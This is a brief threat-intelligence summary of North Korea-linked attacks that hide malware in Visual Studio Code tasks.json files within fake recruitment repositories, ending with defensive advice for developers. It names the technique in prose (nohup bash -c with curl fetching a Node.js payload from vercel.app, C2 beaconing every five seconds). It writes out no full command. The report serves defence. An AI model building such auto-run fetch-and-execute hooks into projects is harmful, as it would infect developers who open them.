Threat Actors Expand Abuse of Microsoft Visual Studio Code
3 months ago
- #DPRK
- #cybersecurity
- #malware
- Threat actors linked to North Korea (DPRK) are abusing Microsoft Visual Studio Code task configuration files (tasks.json) to deliver malware.
- Infection begins when victims clone and open malicious Git repositories, often disguised as recruitment or technical assignments.
- Visual Studio Code's trust prompt, if granted, allows automatic execution of embedded malicious commands from tasks.json.
- On macOS, the attack uses nohup bash -c and curl -s to fetch and execute a JavaScript payload via Node.js.
- Payloads are hosted on vercel.app, a platform increasingly used by DPRK-linked actors.
- The JavaScript backdoor provides remote code execution, system fingerprinting, and C2 communication.
- The malware collects hostname, MAC addresses, OS details, and public IP (via ipify.org) for fingerprinting.
- C2 beaconing occurs every 5 seconds, enabling dynamic JavaScript execution from attacker-controlled servers.
- Additional payloads retrieved post-infection show AI-assisted code generation traits and self-cleanup capabilities.
- Developers should vet repositories, avoid blindly trusting tasks.json, and scrutinize npm install scripts to prevent infection.